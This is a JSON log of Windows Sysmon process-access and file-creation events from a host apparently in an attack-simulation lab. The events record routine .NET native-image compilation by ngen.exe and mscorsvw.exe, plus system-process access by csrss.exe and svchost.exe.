{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.856\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.856","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.856\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.856","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.856\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.856","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:34.715\r\nProcessGuid: {A837DB8D-04C0-5F25-0000-0010A5651000}\r\nProcessId: 4620\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\120c-0\\System.Design.dll\r\nCreationUtcTime: 2020-08-01 05:59:34.715","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:34.715","ProcessGuid":"{A837DB8D-04C0-5F25-0000-0010A5651000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\120c-0\\System.Design.dll","CreationUtcTime":"2020-08-01 05:59:34.715","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.903\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-0010136C1000}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.903","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-0010136C1000}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.903\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-0010136C1000}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.903","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-0010136C1000}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-0010136C1000}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-0010136C1000}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.950\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-00103D6F1000}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.950","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-00103D6F1000}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-00103D6F1000}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-00103D6F1000}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
